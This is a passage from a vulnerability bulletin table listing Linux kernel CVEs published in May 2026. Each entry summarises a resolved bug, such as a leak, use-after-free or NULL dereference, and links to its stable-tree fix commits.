| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: kvm: fix vector context allocation leak When the second kzalloc (host_context.vector.datap) fails in kvm_riscv_vcpu_alloc_vector_context, the first allocation (guest_context.vector.datap) is leaked. Free it before returning. | 2026-05-28 | not yet calculated | CVE-2026-46171 | https://git.kernel.org/stable/c/bd62c0f61bc722a097417401030c596cea8e21aa https://git.kernel.org/stable/c/1d57ab45ec5c0e22789de793bcf2a31ad6fb7d98 https://git.kernel.org/stable/c/b7c958d7c1eb1cb9b2be7b5ee4129fcd66cec978 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: xfrm6: release dst on error in xfrm6_rcv_encap() xfrm6_rcv_encap() performs an IPv6 route lookup when the skb does not already have a dst attached. ip6_route_input_lookup() returns a referenced dst entry even when the lookup resolves to an error route. If dst->error is set, xfrm6_rcv_encap() drops the skb without attaching the dst to the skb and without releasing the reference returned by the lookup. Repeated packets hitting this path therefore leak dst entries. Release the dst before jumping to the drop path. | 2026-05-28 | not yet calculated | CVE-2026-46172 | https://git.kernel.org/stable/c/c2efc4956981066df2fef1cc77391b523db6d8e4 https://git.kernel.org/stable/c/554c9b090c8ac5b1c5c507f4badf8d5d0c9c6e13 https://git.kernel.org/stable/c/9d5047782f9bd2829e529df69209bf3232eb561f https://git.kernel.org/stable/c/6a5eec0a2a0e99ec9743cf8f1c4082178811d90a https://git.kernel.org/stable/c/bc0fcb9823cd0894934cf968b525c575833d7078 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: Don't allow pointer operations on unconfigured streams When reporting the pointer for a compressed stream we report the current I/O frame position by dividing the position by the number of channels multiplied by the number of container bytes. These values default to 0 and are only configured as part of setting the stream parameters so this allows a divide by zero to be configured. Validate that they are non zero, returning an error if not | 2026-05-28 | not yet calculated | CVE-2026-46179 | https://git.kernel.org/stable/c/327a64241f30c74b6f35537eb9e1fc6c3cbe060b https://git.kernel.org/stable/c/98ed1383f597f8a45b6cb816bb20b96d46eeceda https://git.kernel.org/stable/c/0f0c0c1397a42aacaacae828206ee1b921623952 https://git.kernel.org/stable/c/4f42dd01f5217465f23a763e27b3984e114d0972 https://git.kernel.org/stable/c/c5b6285aae050ff1c3ea824ca3d88ac4be1e69c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: Fix potential use-after-free issue when stopping watchdog task Watchdog task might end between send_sig() and kthread_stop() calls, what results in the use-after-free issue. Fix this by increasing watchdog task reference count before calling send_sig() and dropping it by switching to kthread_stop_put(). | 2026-05-28 | not yet calculated | CVE-2026-46180 | https://git.kernel.org/stable/c/ed4168d1a50fef5be8eca947fbbf05a28507d265 https://git.kernel.org/stable/c/d16827cb1d3936f7627d0da6044483f743ebde03 https://git.kernel.org/stable/c/658d2e46c2e9a8eb9b80c5e803ce3c89885b3366 https://git.kernel.org/stable/c/908b92231e1ded53e43fcfad5e0704d83e1b803c https://git.kernel.org/stable/c/c623b63580880cc742255eaed3d79804c1b91143 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pseries/papr-hvpipe: Prevent kernel stack memory leak to userspace The hdr variable is allocated on the stack and only hdr.version and hdr.flags are initialized explicitly. Because the struct papr_hvpipe_hdr contains reserved padding bytes (reserved[3] and reserved2[40]), these could leak the uninitialized bytes to userspace after copy_to_user(). This patch fixes that by initializing the whole struct to 0. | 2026-05-28 | not yet calculated | CVE-2026-46182 | https://git.kernel.org/stable/c/0479b6e9f999cc1cbad7d9f09f574fc387e605d5 https://git.kernel.org/stable/c/f88f8e4485b437e0a2f96a7ff1f88aa22d925659 https://git.kernel.org/stable/c/cefeed44296261173a806bef988b26bc565da4be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs-schemes: protect path kfree() with damon_sysfs_lock damon_sysfs_quot_goal->path can be read and written by users, via DAMON sysfs 'path' file. It can also be indirectly read, for the parameters {on,off}line committing to DAMON. The reads for parameters committing are protected by damon_sysfs_lock to avoid the sysfs files being destroyed while any of the parameters are being read. But the user-driven direct reads and writes are not protected by any lock, while the write is deallocating the path-pointing buffer. As a result, the readers could read the already freed buffer (user-after-free). Note that the user-reads don't race when the same open file is used by the writer, due to kernfs's open file locking. Nonetheless, doing the reads and writes with separate open files would be common. Fix it by protecting both the user-direct reads and writes with damon_sysfs_lock. | 2026-05-28 | not yet calculated | CVE-2026-46183 | https://git.kernel.org/stable/c/a34ca3e33da4b924c66bcca3729bf68ec5936910 https://git.kernel.org/stable/c/cf3b71421ca00807328c6d9cd242f9de3b77a4bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sound: ua101: fix division by zero at probe Add a missing sanity check for bNrChannels in detect_usb_format() to prevent a division by zero in playback_urb_complete() and capture_urb_complete(). USB core does not validate class-specific descriptor fields such as bNrChannels, so drivers must verify them before use. If a device provides bNrChannels = 0, frame_bytes becomes zero and is later used as a divisor in the URB completion handlers, leading to a kernel crash. | 2026-05-28 | not yet calculated | CVE-2026-46184 | https://git.kernel.org/stable/c/6162e8212e88c39492d981b248b5e37002486c66 https://git.kernel.org/stable/c/593dd7e6c890d8e4ca21b3e2f796b7cb8e8da983 https://git.kernel.org/stable/c/0ff2b713f406e9ecadb406014d74e7a020ac12b1 https://git.kernel.org/stable/c/f1862dbf09080254c52175a448290c784dd7d3de https://git.kernel.org/stable/c/d1f73f169c1014463b5060e3f60813e13ddc7b87 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: virtio_bt: validate rx pkt_type header length virtbt_rx_handle() reads the leading pkt_type byte from the RX skb and forwards the remainder to hci_recv_frame() for every event/ACL/SCO/ISO type, without checking that the remaining payload is at least the fixed HCI header for that type. After the preceding patch bounds the backend-supplied used.len to [1, VIRTBT_RX_BUF_SIZE], a one-byte completion still reaches hci_recv_frame() with skb->len already pulled to 0. If the byte happened to be HCI_ACLDATA_PKT, the ACL-vs-ISO classification fast-path in hci_dev_classify_pkt_type() dereferences hci_acl_hdr(skb)->handle whenever the HCI device has an active CIS_LINK, BIS_LINK, or PA_LINK connection, reading two bytes of uninitialized RX-buffer data. The same hazard exists for every packet type the driver accepts because none of the switch cases in virtbt_rx_handle() check skb->len against the per-type minimum HCI header size before handing the frame to the core. After stripping pkt_type, require skb->len to cover the fixed header size for the selected type (event 2, ACL 4, SCO 3, ISO 4) before calling hci_recv_frame(); drop ratelimited otherwise. Unknown pkt_type values still take the original kfree_skb() default path. Use bt_dev_err_ratelimited() because both the length and pkt_type values come from an untrusted backend that can otherwise flood the kernel log. | 2026-05-28 | not yet calculated | CVE-2026-46186 | https://git.kernel.org/stable/c/1e1e509b6fd2a42421745bbcd98bd16daad20904 https://git.kernel.org/stable/c/2c1143564c71e7497b42d8360a8379ccbb011d3c https://git.kernel.org/stable/c/3485c7236c59c8c34a41af1c4b52982437554e79 https://git.kernel.org/stable/c/f743eab6486965f276c7e3f1700895f014fdc6db https://git.kernel.org/stable/c/daf23014e5d975e72ea9c02b5160d3fcf070ea47 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rsi: fix kthread lifetime race between self-exit and external-stop RSI driver use both self-exit(kthread_complete_and_exit) and external-stop (kthread_stop) when killing a kthread. Generally, kthread_stop() is called first, and in this case, no particular issues occur. However, in rare instances where kthread_complete_and_exit() is called first and then kthread_stop() is called, a UAF occurs because the kthread object, which has already exited and been freed, is accessed again. Therefore, to prevent this with minimal modification, you must remove kthread_stop() and change the code to wait until the self-exit operation is completed. | 2026-05-28 | not yet calculated | CVE-2026-46187 | https://git.kernel.org/stable/c/95fcb436586dc3c2983537d557ac05bbc6a027f3 https://git.kernel.org/stable/c/16d9f674c619838bdeae42abc0929c9c5477ea1f https://git.kernel.org/stable/c/4f9a4ae8d2c198f01611ea376034c326ef43ab56 https://git.kernel.org/stable/c/4f4c9b13c485abd0a2d2c97f9db339d1dd8e147f https://git.kernel.org/stable/c/db57a1aa54ff68669781976e4edb045e09e2b65b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeon_ep_vf: add NULL check for napi_build_skb() napi_build_skb() can return NULL on allocation failure. In __octep_vf_oq_process_rx(), the result is used directly without a NULL check in both the single-buffer and multi-fragment paths, leading to a NULL pointer dereference. Add NULL checks after both napi_build_skb() calls, properly advancing descriptors and consuming remaining fragments on failure. | 2026-05-28 | not yet calculated | CVE-2026-46188 | https://git.kernel.org/stable/c/60246cdd4c515ea7d920cddf48932efcb990773e https://git.kernel.org/stable/c/b0f4711b426a06fb4c4be85c36b9f5588d5140d3 https://git.kernel.org/stable/c/6fef6640bbf360e254cc0174365ed30ce3a07572 https://git.kernel.org/stable/c/dd66b42854705e4e4ee7f14d260f86c578bed3e3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/vmw_pvrdma: Fix double free on pvrdma_alloc_ucontext() error path Sashiko points out that pvrdma_uar_free() is already called within pvrdma_dealloc_ucontext(), so calling it before triggers a double free. | 2026-05-28 | not yet calculated | CVE-2026-46189 | https://git.kernel.org/stable/c/ecc36a82ecfcfdf3c6606d209f22ec5543c410e0 https://git.kernel.org/stable/c/45d25e3ec17900bf5a9d6876ff16ceee31c4c0e0 https://git.kernel.org/stable/c/0c63333ff97bd1275294fd12840a0efe9d7a4c59 https://git.kernel.org/stable/c/935ee27d0904aa944cbcc979094c20e5ef62eead https://git.kernel.org/stable/c/e38e86995df27f1f854063dab1f0c6a513db3faf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbcon: Avoid OOB font access if console rotation fails Clear the font buffer if the reallocation during console rotation fails in fbcon_rotate_font(). The putcs implementations for the rotated buffer will return early in this case. See [1] for an example. Currently, fbcon_rotate_font() keeps the old buffer, which is too small for the rotated font. Printing to the rotated console with a high-enough character code will overflow the font buffer. v2: - fix typos in commit message | 2026-05-28 | not yet calculated | CVE-2026-46191 | https://git.kernel.org/stable/c/594973a2e54924d8ba31c9faac669fc1ba6fcb80 https://git.kernel.org/stable/c/ab6c34b9829d5de03f1d08a47a2253729a6e7e27 https://git.kernel.org/stable/c/7105d9f1387d63b15c9a860674fc92c959181f2f https://git.kernel.org/stable/c/b44cc78ff46b96e72d333a3be6aaaa0a14797263 https://git.kernel.org/stable/c/e4ef723d8975a2694cc90733a6b888a5e2841842 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: microchip-core-qspi: don't attempt to transmit during emulated read-only dual/quad operations The core will deal with reads by creating clock cycles itself, there's no need to generate clock cycles by transmitting garbage data at the driver level. Further, transmitting garbage data just bricks the transfer since QSPI doesn't have a dedicated master-out line like MOSI in regular SPI. I'm not entirely sure if the transfer is bricked because of the garbage data being transmitted on the bus or because the core loses track of whether it is supposed to be sending or receiving data. | 2026-05-28 | not yet calculated | CVE-2026-46192 | https://git.kernel.org/stable/c/ec9d0ddbde6003c303fa5e1d5cd48952852984d8 https://git.kernel.org/stable/c/67184f361ab4d9fac6d2b8d5fed6649d496038a4 https://git.kernel.org/stable/c/eb56deaabf127e8985fc91fa6c97bf8a3b062844 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: ah: account for ESN high bits in async callbacks AH allocates its temporary auth/ICV layout differently when ESN is enabled: the async ahash setup appends a 4-byte seqhi slot before the ICV or auth_data area, but the async completion callbacks still reconstruct the temporary layout as if seqhi were absent. With an async AH implementation selected, that makes AH copy or compare the wrong bytes on both the IPv4 and IPv6 paths. In UML repro on IPv4 AH with ESN and forced async hmac(sha1), ping fails with 100% packet loss, and the callback logs show the pre-fix drift: ah4 output_done: esn=1 err=0 icv_off=20 expected_off=24 ah4 input_done: esn=1 auth_off=20 expected_auth_off=24 icv_off=32 expected_icv_off=36 Reconstruct the callback-side layout the same way the setup path built it by skipping the ESN seqhi slot before locating the saved auth_data or ICV. Per RFC 4302, the ESN high-order 32 bits participate in the AH ICV computation, so the async callbacks must account for the seqhi slot. Post-fix, the same IPv4 AH+ESN+forced-async-hmac(sha1) UML repro shows the corrected offset (ah4 output_done: esn=1 err=0 icv_off=24 expected_off=24) and ping succeeds; net/ipv4/ah4.o and net/ipv6/ah6.o build clean at W=1. IPv6 AH+ESN was not exercised at runtime, and the change has not been tested against a real async hardware AH engine. | 2026-05-28 | not yet calculated | CVE-2026-46193 | https://git.kernel.org/stable/c/0555d4f526232b3c9e3afbcd490c0c0793aefec6 https://git.kernel.org/stable/c/729899a2aa8bda7844be0cdcd3b470f11b912eda https://git.kernel.org/stable/c/7db99a09b3bc87268287bc7ab5f2e7f382b5ad87 https://git.kernel.org/stable/c/2ffaa7a94f9a4d22724364a1821735a0231d9f8d https://git.kernel.org/stable/c/ec54093e6a8f87e800bb6aa15eb7fc1e33faa524 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix node_cnt race between extent node destroy and writeback f2fs_destroy_extent_node() does not set FI_NO_EXTENT before clearing extent nodes. When called from f2fs_drop_inode() with I_SYNC set, concurrent kworker writeback can insert new extent nodes into the same extent tree, racing with the destroy and triggering f2fs_bug_on() in __destroy_extent_node(). The scenario is as follows: drop inode writeback - iput - f2fs_drop_inode // I_SYNC set - f2fs_destroy_extent_node - __destroy_extent_node - while (node_cnt) { write_lock(&et->lock) __free_extent_tree write_unlock(&et->lock) - __writeback_single_inode - f2fs_outplace_write_data - f2fs_update_read_extent_cache - __update_extent_tree_range // FI_NO_EXTENT not set, // insert new extent node } // node_cnt == 0, exit while - f2fs_bug_on(node_cnt) // node_cnt > 0 Additionally, __update_extent_tree_range() only checks FI_NO_EXTENT for EX_READ type, leaving EX_BLOCK_AGE updates completely unprotected. This patch set FI_NO_EXTENT under et->lock in __destroy_extent_node(), consistent with other callers (__update_extent_tree_range and __drop_extent_tree) and check FI_NO_EXTENT for both EX_READ and EX_BLOCK_AGE tree. | 2026-05-28 | not yet calculated | CVE-2026-46194 | https://git.kernel.org/stable/c/42dd1c91f993431d0b399502479d00e6ad1bca71 https://git.kernel.org/stable/c/ab1eaf9d5c99042f5b0243bf67a06283a4c0757f https://git.kernel.org/stable/c/b0e4395870eb3441ddc959f6710b5f6ca61aff26 https://git.kernel.org/stable/c/0559a0e962aacbb47519e26ee663be04b72dcb92 https://git.kernel.org/stable/c/ed78aeebef05212ef7dca93bd931e4eff67c113f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracepoint: balance regfunc() on func_add() failure in tracepoint_add_func() When a tracepoint goes through the 0 -> 1 transition, tracepoint_add_func() invokes the subsystem's ext->regfunc() before attempting to install the new probe via func_add(). If func_add() then fails (for example, when allocate_probes() cannot allocate a new probe array under memory pressure and returns -ENOMEM), the function returns the error without calling the matching ext->unregfunc(), leaving the side effects of regfunc() behind with no installed probe to justify them. For syscall tracepoints this is particularly unpleasant: syscall_regfunc() bumps sys_tracepoint_refcount and sets SYSCALL_TRACEPOINT on every task. After a leaked failure, the refcount is stuck at a non-zero value with no consumer, and every task continues paying the syscall trace entry/exit overhead until reboot. Other subsystems providing regfunc()/unregfunc() pairs exhibit similarly scoped persistent state. Mirror the existing 1 -> 0 cleanup and call ext->unregfunc() in the func_add() error path, gated on the same condition used there so the unwind is symmetric with the registration. | 2026-05-28 | not yet calculated | CVE-2026-46196 | https://git.kernel.org/stable/c/247ed8a969f981bfba3112fd4bb441eaa6cef59c https://git.kernel.org/stable/c/7bcadb3c2bc1cf60690e931aadd35fb7bd646a49 https://git.kernel.org/stable/c/2c5b8eeea006eb694c81631cd5713d494b80be90 https://git.kernel.org/stable/c/342829e042ac00f3d68d442ea92873fb6683f494 https://git.kernel.org/stable/c/fad217e16fded7f3c09f8637b0f6a224d58b5f2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: fix controller deregistration Make sure to deregister the controller before disabling and releasing underlying resources like interrupts and gpios during driver unbind. | 2026-05-28 | not yet calculated | CVE-2026-46200 | https://git.kernel.org/stable/c/a3669f678d0ee8b686d3eea4c0ed9817c9374945 https://git.kernel.org/stable/c/28f28a0f4e327f792c230493a0ea00389ff68ff5 https://git.kernel.org/stable/c/7fea80d93bfd34051b2ac1cec07766c87d8d28be https://git.kernel.org/stable/c/0f997fdae819a8c2cc83bd4ff7d935ad76c727c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: appletb-kbd: run inactivity autodim from workqueues The autodim code in hid-appletb-kbd takes backlight_device->ops_lock via backlight_device_set_brightness() -> mutex_lock() from two different atomic contexts: * appletb_inactivity_timer() is a struct timer_list callback, so it runs in softirq context. Every expiry triggers BUG: sleeping function called from invalid context at kernel/locking/mutex.c:591 Call Trace: <IRQ> __might_resched __mutex_lock backlight_device_set_brightness appletb_inactivity_timer call_timer_fn run_timer_softirq * reset_inactivity_timer() is called from appletb_kbd_hid_event() and appletb_kbd_inp_event(). On real USB hardware these run in softirq/IRQ context (URB completion and input-event dispatch). When the Touch Bar has already been dimmed or turned off, the reset path calls backlight_device_set_brightness() directly to restore brightness, producing the same warning. Both call sites hit the same mutex_lock()-from-atomic bug. Fix them together by moving the blocking work onto the system workqueue: * Convert the inactivity timer from struct timer_list to struct delayed_work; the callback (appletb_inactivity_work) now runs in process context where mutex_lock() is legal. * Add a dedicated struct work_struct restore_brightness_work and have reset_inactivity_timer() schedule it instead of calling backlight_device_set_brightness() directly. Cancel both works synchronously during driver tear-down alongside the existing backlight reference drop. The semantics are unchanged (same delays, same state transitions on dim, turn-off and user activity); only the execution context of the sleeping call changes. The timer field and callback are renamed to match their new type; reset_inactivity_timer() keeps its name because it is invoked from input event paths that read naturally as "reset the inactivity timer". | 2026-05-28 | not yet calculated | CVE-2026-46202 | https://git.kernel.org/stable/c/5c0830323689ef15224f0025276176988861b3b0 https://git.kernel.org/stable/c/2473a334c292af257ef68e33bc7760f4a8251812 https://git.kernel.org/stable/c/1654e53349d4e657b331de354313461f401f5063 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: cadence-quadspi: fix unclocked access on unbind Make sure that the controller is runtime resumed before disabling it during driver unbind to avoid an unclocked register access. This issue was flagged by Sashiko when reviewing a controller deregistration fix. | 2026-05-28 | not yet calculated | CVE-2026-46203 | https://git.kernel.org/stable/c/d67a5311818b3e6481a1e4293c9337ebfee73111 https://git.kernel.org/stable/c/233db2cb14db8b1935dda52a6affd97276462b82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: fix empty payload in tap skb for non-linear buffers For non-linear skbs, virtio_transport_build_skb() goes through virtio_transport_copy_nonlinear_skb() to copy the original payload in the new skb to be delivered to the vsockmon tap device. This manually initializes an iov_iter but does not set iov_iter.count. Since the iov_iter is zero-initialized, the copy length is zero and no payload is actually copied to the monitor interface, leaving data un-initialized. Fix this by removing the linear vs non-linear split and using skb_copy_datagram_iter() with iov_iter_kvec() for all cases, as vhost-vsock already does. This handles both linear and non-linear skbs, properly initializes the iov_iter, and removes the now unused virtio_transport_copy_nonlinear_skb(). While touching this code, let's also check the return value of skb_copy_datagram_iter(), even though it's unlikely to fail. | 2026-05-28 | not yet calculated | CVE-2026-46207 | https://git.kernel.org/stable/c/06747f52ab157591cec7e5623a759473b66ef6f6 https://git.kernel.org/stable/c/52da6a74ca3de0fcda60301096b71534b3b18641 https://git.kernel.org/stable/c/378b131a25bd1a5ee27ca199fe486c299d5350c5 https://git.kernel.org/stable/c/3a3e3d90cbc79600544536723911657730759af3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/gem: fix error handling in msm_ioctl_gem_info_get_metadata() msm_ioctl_gem_info_get_metadata() always returns 0 regardless of errors. When copy_to_user() fails or the user buffer is too small, the error code stored in ret is ignored because the function unconditionally returns 0. This causes userspace to believe the ioctl succeeded when it did not. Additionally, kmemdup() can return NULL on allocation failure, but the return value is not checked. This leads to a NULL pointer dereference in the subsequent copy_to_user() call. Add the missing NULL check for kmemdup() and return ret instead of 0. Note that the SET counterpart (msm_ioctl_gem_info_set_metadata) correctly returns ret. Patchwork: https://patchwork.freedesktop.org/patch/714478/ | 2026-05-28 | not yet calculated | CVE-2026-46211 | https://git.kernel.org/stable/c/697e1a9559f6962f999cc4c748c2ffffcc0a7a7a https://git.kernel.org/stable/c/c57c861956b89f2e2528e6384d51e2dedd915809 https://git.kernel.org/stable/c/b079e85c91f446f29e808d8291189e897f1884ff https://git.kernel.org/stable/c/47cbfe2608314b833ad61a65827d8fb363bc2d2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: appletb-kbd: fix UAF in inactivity-timer cleanup path Commit 38224c472a03 ("HID: appletb-kbd: fix slab use-after-free bug in appletb_kbd_probe") added timer_delete_sync(&kbd->inactivity_timer) to both the probe close_hw error path and appletb_kbd_remove(), but the way it was wired in left the inactivity timer reachable during driver tear-down via two distinct windows. Window A -- put_device() before timer_delete_sync(): put_device(&kbd->backlight_dev->dev); timer_delete_sync(&kbd->inactivity_timer); The inactivity_timer softirq reads kbd->backlight_dev and calls backlight_device_set_brightness() -> mutex_lock(&ops_lock). If a concurrent hid_appletb_bl unbind drops the last devm reference between these two calls, the backlight_device is freed and the mutex_lock() touches freed memory. Window B -- backlight cleanup before hid_hw_stop(): if (kbd->backlight_dev) { timer_delete_sync(...); put_device(...); } hid_hw_close(hdev); hid_hw_stop(hdev); Even after Window A is closed, hid_hw_close()/hid_hw_stop() still run afterwards, so a late ".event" callback from the HID core (USB URB completion on real Apple hardware) can arrive after timer_delete_sync() drained the softirq but before put_device() drops the reference. That callback reaches reset_inactivity_timer(), which calls mod_timer() and re-arms the timer. The freshly re-armed timer can then fire on the about-to-be-freed backlight_device. Both windows produce the same KASAN slab-use-after-free: BUG: KASAN: slab-use-after-free in __mutex_lock+0x1aab/0x21c0 Read of size 8 at addr ffff88803ee9a108 by task swapper/0/0 Call Trace: <IRQ> __mutex_lock backlight_device_set_brightness appletb_inactivity_timer call_timer_fn run_timer_softirq handle_softirqs Allocated by task N: devm_backlight_device_register appletb_bl_probe Freed by task M: (concurrent hid_appletb_bl unbind path) Close both windows at once by reworking the tear-down in appletb_kbd_remove() and in the probe close_hw error path so that 1) hid_hw_close()/hid_hw_stop() run before the backlight cleanup, guaranteeing no further .event callback can fire and re-arm the timer, and 2) inside the "if (kbd->backlight_dev)" block, timer_delete_sync() runs before put_device(), so the softirq is drained before the final reference is dropped. | 2026-05-28 | not yet calculated | CVE-2026-46213 | https://git.kernel.org/stable/c/59a79938ca5541fe55d675304116b7ea684afef0 https://git.kernel.org/stable/c/93d989e47bc316c793a69c6a332e053c90e29f02 https://git.kernel.org/stable/c/4db2af929279c799b5653a39eb0795c72baffca4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: fix accept queue count leak on transport mismatch virtio_transport_recv_listen() calls sk_acceptq_added() before vsock_assign_transport(). If vsock_assign_transport() fails or selects a different transport, the error path returns without calling sk_acceptq_removed(), permanently incrementing sk_ack_backlog. After approximately backlog+1 such failures, sk_acceptq_is_full() returns true, causing the listener to reject all new connections. Fix by moving sk_acceptq_added() to after the transport validation, matching the pattern used by vmci_transport and hyperv_transport. | 2026-05-28 | not yet calculated | CVE-2026-46214 | https://git.kernel.org/stable/c/65c484726e74013a2ec7ba67a34d87760ae8f390 https://git.kernel.org/stable/c/29371f3cc83e2a92265b4768014a30b80234112f https://git.kernel.org/stable/c/e9edf9893cf26d060705c910a9b62d8cc96ed56a https://git.kernel.org/stable/c/6d3275fc4ed968938e1d556c344798046776668d https://git.kernel.org/stable/c/52bcb57a4e8a0865a76c587c2451906342ae1b2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/hdcp: Add NULL check for media_gt in intel_hdcp_gsc_check_status() When media GT is disabled via configfs, there is no allocation for media_gt, which is kept as NULL. In such scenario, intel_hdcp_gsc_check_status() results in a kernel pagefault error due to >->uc.gsc being evaluated as an invalid memory address. Fix that by introducing a NULL check on media_gt and bailing out early if so. While at it, also drop the NULL check for gsc, since it can't be NULL if media_gt is not NULL. v2: - Get address for gsc only after checking that gt is not NULL. (Shuicheng) - Drop the NULL check for gsc. (Shuicheng) v3: - Add "Fixes" and "Cc: <stable...>" tags. (Matt) (cherry picked from commit bfaf87e84ca3ca3f6e275f9ae56da47a8b55ffd1) | 2026-05-28 | not yet calculated | CVE-2026-46216 | https://git.kernel.org/stable/c/d8ab4b47edf4578dbfbe5e95817107a514fa34cc https://git.kernel.org/stable/c/60a1e131a811b68703da58fd805ab359b704ab03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn4: Avoid overflow on msg bound check As pointed out by SDL, the previous condition may be vulnerable to overflow. (cherry picked from commit 3c5367d950140d4ec7af830b2268a5a6fdaa3885) | 2026-05-28 | not yet calculated | CVE-2026-46217 | https://git.kernel.org/stable/c/5bb5faff4837b1d98fd655cf8bd7b5d4da0fc4dc https://git.kernel.org/stable/c/73043d296787bf187d89ffb5c5dcf5bdc3db7885 https://git.kernel.org/stable/c/271cd5429513ff9b364a9bf8903e5b65b687eb25 https://git.kernel.org/stable/c/30d12ee310a6024ff4c7b9eafdbbeab2db450d4a https://git.kernel.org/stable/c/65bce27ea6192320448c30267ffc17ffa094e713 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: fix use-after-free on unbind The state machine work is scheduled by the interrupt handler and therefore needs to be cancelled after disabling interrupts to avoid a potential use-after-free. | 2026-05-28 | not yet calculated | CVE-2026-46219 | https://git.kernel.org/stable/c/bb6b50f709c5a01906ff72a07fdc070bb3357188 https://git.kernel.org/stable/c/ee52da0dd83ebcd89ecbbe2660c57b15a25489f2 https://git.kernel.org/stable/c/6c3e413919a12627d04a31a4a5fccb9fc129bb02 https://git.kernel.org/stable/c/bbcd6dd8e9f264440eaf6167382bf404911c1c46 https://git.kernel.org/stable/c/706b3dc2ac7a998c55e14b3fd2e8f934c367e6e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/sdma4: replace BUG_ON with WARN_ON in fence emission sdma_v4_0_ring_emit_fence() contains two BUG_ON(addr & 0x3) assertions that verify fence writeback addresses are dword-aligned. These assertions can be reached from unprivileged userspace via crafted DRM_IOCTL_AMDGPU_CS submissions, causing a fatal kernel panic in a scheduler worker thread. Replace both BUG_ON() calls with WARN_ON() to log the condition without crashing the kernel. A misaligned fence address at this point indicates a driver bug, but crashing the kernel is never the correct response when the assertion is reachable from userspace. The CS IOCTL path is the correct place to filter invalid submissions; the ring emission callback is too late to do anything about it. (cherry picked from commit b90250bd933afd1ba94d86d6b13821997b22b18e) | 2026-05-28 | not yet calculated | CVE-2026-46220 | https://git.kernel.org/stable/c/4f7ca00fa91daf0795ec6b3b130c5ebba1f155fe https://git.kernel.org/stable/c/d331fb241a4602253976ddd65144a8ba2b05665d https://git.kernel.org/stable/c/0b91ea46bb68abf98a082bf239092253bbd6aaa2 https://git.kernel.org/stable/c/a4fd82fb0757c180bf622907397c528b89a827b2 https://git.kernel.org/stable/c/78d2e624fa073c14970aa097adcf3ea31c157a66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EDAC/versalnet: Fix device name memory leak The device name allocated via kzalloc() in init_one_mc() is assigned to dev->init_name but never freed on the normal removal path. device_register() copies init_name and then sets dev->init_name to NULL, so the name pointer becomes unreachable from the device. Thus leaking memory. Use a stack-local char array instead of using kzalloc() for name. | 2026-05-28 | not yet calculated | CVE-2026-46221 | https://git.kernel.org/stable/c/24d2912962d087ebff7c4984f8ac34a5f23c8dbf https://git.kernel.org/stable/c/b16033c8774f5fb4c0cb9b445a1dfc68f499ae6a https://git.kernel.org/stable/c/8cf5dd235eff6008cb04c3d8064d2acfa90616f1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rockchip: rkcif: Add missing MUST_CONNECT flag to pads The pads missed checks for connected devices which may a null dereference when the stream is enabled. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000020 pc : rkcif_interface_enable_streams+0x48/0xf0 lr : rkcif_interface_enable_streams+0x44/0xf0 Call trace: rkcif_interface_enable_streams+0x48/0xf0 v4l2_subdev_enable_streams+0x26c/0x3f0 rkcif_stream_start_streaming+0x140/0x278 vb2_start_streaming+0x74/0x188 vb2_core_streamon+0xe0/0x1d8 vb2_ioctl_streamon+0x60/0xa8 v4l_streamon+0x2c/0x40 __video_do_ioctl+0x34c/0x400 video_usercopy+0x2d0/0x800 video_ioctl2+0x20/0x60 v4l2_ioctl+0x48/0x78 | 2026-05-28 | not yet calculated | CVE-2026-46222 | https://git.kernel.org/stable/c/318142640590342bfec7aa06d0bdcd0ddbf953d0 https://git.kernel.org/stable/c/8e3c751259dc2d1325838eff26f41032523c7b57 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cgroup: Defer css percpu_ref kill on rmdir until cgroup is depopulated A chain of commits going back to v7.0 reworked rmdir to satisfy the controller invariant that a subsystem's ->css_offline() must not run while tasks are still doing kernel-side work in the cgroup. [1] d245698d727a ("cgroup: Defer task cgroup unlink until after the task is done switching out") [2] a72f73c4dd9b ("cgroup: Don't expose dead tasks in cgroup") [3] 1b164b876c36 ("cgroup: Wait for dying tasks to leave on rmdir") [4] 4c56a8ac6869 ("cgroup: Fix cgroup_drain_dying() testing the wrong condition") [5] 13e786b64bd3 ("cgroup: Increment nr_dying_subsys_* from rmdir context") [1] moved task cset unlink from do_exit() to finish_task_switch() so a task's cset link drops only after the task has fully stopped scheduling. That made tasks past exit_signals() linger on cset->tasks until their final context switch, which led to a series of problems as what userspace expected to see after rmdir diverged from what the kernel needs to wait for. [2]-[5] tried to bridge that divergence: [2] filtered the exiting tasks from cgroup.procs; [3] had rmdir(2) sleep in 